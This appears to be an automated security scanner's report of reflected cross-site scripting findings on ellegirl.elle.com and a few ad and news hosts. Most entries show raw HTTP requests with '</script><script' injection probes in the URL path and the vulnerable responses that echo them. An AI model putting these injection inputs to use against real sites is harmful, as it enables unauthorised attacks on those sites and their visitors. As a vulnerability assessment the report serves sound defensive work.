HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:52 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30499 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:57 GMT Date: Sat, 17 Sep 2011 16:34:57 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themesf8d6c</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.hr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis52609</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:28 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30499 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:32 GMT Date: Sat, 17 Sep 2011 16:36:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:38:03 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30499 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:38:07 GMT Date: Sat, 17 Sep 2011 16:38:07 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /****** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:22 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30498 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:26 GMT Date: Sat, 17 Sep 2011 16:39:26 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /********* ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:40:07 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30499 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:40:08 GMT Date: Sat, 17 Sep 2011 16:40:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... le; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHI ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content92cc4</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:03 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:08 GMT Date: Sat, 17 Sep 2011 16:33:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content92cc4</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes3066f</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:46 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:50 GMT Date: Sat, 17 Sep 2011 16:34:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes3066f</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesiscdcad</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:23 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:27 GMT Date: Sat, 17 Sep 2011 16:36:27 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /********* ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:38:00 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:38:04 GMT Date: Sat, 17 Sep 2011 16:38:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:14 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:17 GMT Date: Sat, 17 Sep 2011 16:39:17 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content9b706</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:32:45 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30481 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:32:53 GMT Date: Sat, 17 Sep 2011 16:32:53 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content9b706</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themesc9a9c</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:30 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30481 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:33 GMT Date: Sat, 17 Sep 2011 16:34:33 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themesc9a9c</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /********** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesise6a72</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:05 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30481 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:10 GMT Date: Sat, 17 Sep 2011 16:36:10 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... rop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content/themes/thesis Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:38 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30480 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:41 GMT Date: Sat, 17 Sep 2011 16:37:41 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/themes //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-includes/js/jquery |
GET /wp-includesef724</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:32:57 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30474 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:01 GMT Date: Sat, 17 Sep 2011 16:33:01 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-includesef724</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*********** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js7b8e6</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:28 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30474 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:32 GMT Date: Sat, 17 Sep 2011 16:34:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-includes/js7b8e6</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jquery7b22c</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:35:53 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30474 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:35:56 GMT Date: Sat, 17 Sep 2011 16:35:56 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-includes/js/jquery7b22c</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jquery Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:18 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30473 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:21 GMT Date: Sat, 17 Sep 2011 16:37:21 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-includes/js/jquery //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYT ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /event.flow |
GET /event.flow?eventcode=000 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=ec39c893-8f48-41a8 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B310EB905 Cache-Control: no-store Content-Type: text/javascript;charset Content-Length: 145 Date: Sat, 17 Sep 2011 16:39:40 GMT Connection: close if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__( |
Severity: | High |
Confidence: | Certain |
Host: | http://events.seattlepi |
Path: | /partner_json/search |
